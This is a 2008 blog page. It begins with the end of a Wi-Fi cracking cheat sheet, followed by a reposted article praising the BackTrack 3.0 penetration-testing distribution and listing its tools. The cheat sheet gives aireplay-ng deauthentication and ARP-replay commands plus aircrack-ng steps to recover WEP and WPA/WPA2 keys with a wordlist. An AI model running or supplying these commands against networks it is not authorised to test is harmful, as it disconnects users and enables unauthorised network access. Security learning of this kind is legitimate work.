aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0
new console
aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0
aircrack-ng hasil*.cap
aircrack-ptw hasil-01.cap
c. WPA/WPA2 Crack
airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0
new console
aircrack-ng -w password.lst [hasil*cap]
Pergunakan dengan arif dan bijak
Hacking tools: A new version of BackTrack helps ethical hackers
Monday, December 1, 2008
·
0
comments
Labels:
Backtract DOWNLOAD,
hacking,
Wi-Fi,
wireless
Version 3.0 of BackTrack has been released. BackTrack is a Linux-based distribution dedicated to penetration testing or hacking (depending on how you look at it). It contains more than 300 of the world's most popular open source or freely distributable hacking tools.
I wrote about the first version of BackTrack back in 2006, although it was based off of Whax/Whoppix/Knoppix distributions, which started even earlier. Version 3.0, released on June 19, includes even more hacking tools (unfortunately, it still doesn't include Nessus due to vendor negotiations/restrictions), many fixes bugs, and improved menus.
Readers often ask me how they can quickly get up to speed on hacking or defending against hackers. My answer is always the same: Subscribe to multiple computer security distribution lists, read as much as you can, and learn how to (legally) hack. BackTrack is the quickest way to get access to hundreds of tools, if the Linux part doesn't scare you. For non-Linux users, this distribution is about as Windows-friendly as you can get. Most users can get up and running using BackTrack with little or no Linux knowledge. The KDE graphical user interface makes most tools and programs usable with a few mouse clicks. For instance, setting up Snort is a one-click process (try that outside of BackTrack).
BackTrack also does a decent job for wireless and password hacking. Although there's a long list of include tools, here are my personal favorites:
- Metasploit (vulnerability tester)
- Snort (intrusion detection/prevention)
- Hping (packet shaper)
- Nmap (fe gui included)
- Xprobe2 (OS identifier)
- Cisco Auditing Tool
- Curl
- Httprint (and GUI)
- Lynx (bare-bones browser)
- Nikto (awesome free Web site vulnerability scanner)
- SQL Scanner
- Milw0rm archive
- Dsniff
- Ettercap
- Hydra (password guesser)
- John the Ripper
- Wireshark (packet sniffer/analyzer)
- Kismet
- Airsnort
- Bluesnarfer
- SIPCrack
- OllyDBG
Not only does BackTrack have an excellent collection of tools, the designers of the CD have tried to align BackTrack with common penetration-testing guideline frameworks, including the Open Source Security Testing Methodology Manual and Information Systems Security Assessment Framework, which can only help any budding pen tester.
You can download several different types of images, including a 784MB USB/DVD image, a stripped-down 695MB ISO, and a 689MB VMware image.
Lest I get any angry readers taking me to task for "teaching malicious hacking," these tools are for the good guys. Bad hackers are already doing just fine without the supereasy toolkits. Overall, we need more defenders learning more, and tools like BackTrack help in that regard.
Read More......
Subscribe to:
Posts (Atom)
